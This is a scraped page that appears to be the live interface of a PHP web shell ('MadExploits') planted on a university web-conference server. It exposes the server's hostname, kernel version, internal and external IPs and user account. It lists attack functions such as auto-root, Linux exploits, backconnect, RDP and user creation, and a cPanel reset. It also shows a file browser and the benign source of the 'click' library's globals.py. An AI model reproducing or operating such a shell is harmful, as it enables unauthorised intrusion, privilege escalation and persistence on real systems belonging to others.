Linux web-conference.aiou.edu.pk 5.4.0-204-generic #224-Ubuntu SMP Thu Dec 5 13:38:28 UTC 2024 x86_64
Apache/2.4.41 (Ubuntu)
: 172.16.50.247 | : 3.145.20.182
Cant Read [ /etc/named.conf ]
7.4.3-4ubuntu2.28
appadmin
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
BLACK DEFEND!
README
+ Create Folder
+ Create File
/
usr /
lib /
python3 /
dist-packages /
click /
[ HOME SHELL ]
Name
Size
Permission
Action
__pycache__
[ DIR ]
drwxr-xr-x
__init__.py
2.72
KB
-rw-r--r--
_bashcomplete.py
10.76
KB
-rw-r--r--
_compat.py
22.85
KB
-rw-r--r--
_termui_impl.py
19.15
KB
-rw-r--r--
_textwrap.py
1.17
KB
-rw-r--r--
_unicodefun.py
4.26
KB
-rw-r--r--
_winconsole.py
8.75
KB
-rw-r--r--
core.py
73.54
KB
-rw-r--r--
decorators.py
10.96
KB
-rw-r--r--
exceptions.py
7.48
KB
-rw-r--r--
formatting.py
8.68
KB
-rw-r--r--
globals.py
1.48
KB
-rw-r--r--
parser.py
15.15
KB
-rw-r--r--
termui.py
22.66
KB
-rw-r--r--
testing.py
12.76
KB
-rw-r--r--
types.py
22.74
KB
-rw-r--r--
utils.py
15.39
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : globals.py
from threading import local _local = local() def get_current_context(silent=False): """Returns the current click context. This can be used as a way to access the current context object from anywhere. This is a more implicit alternative to the :func:`pass_context` decorator. This function is primarily useful for helpers such as :func:`echo` which might be interested in changing its behavior based on the current context. To push the current context, :meth:`Context.scope` can be used. .. versionadded:: 5.0 :param silent: is set to `True` the return value is `None` if no context is available. The default behavior is to raise a :exc:`RuntimeError`. """ try: return getattr(_local, 'stack')[-1] except (AttributeError, IndexError): if not silent: raise RuntimeError('There is no active click context.') def push_context(ctx): """Pushes a new context to the current stack.""" _local.__dict__.setdefault('stack', []).append(ctx) def pop_context(): """Removes the top level from the stack.""" _local.stack.pop() def resolve_color_default(color=None): """"Internal helper to get the default value of the color flag. If a value is passed it's returned unchanged, otherwise it's looked up from the current context. """ if color is not None: return color ctx = get_current_context(silent=True) if ctx is not None: return ctx.color
Close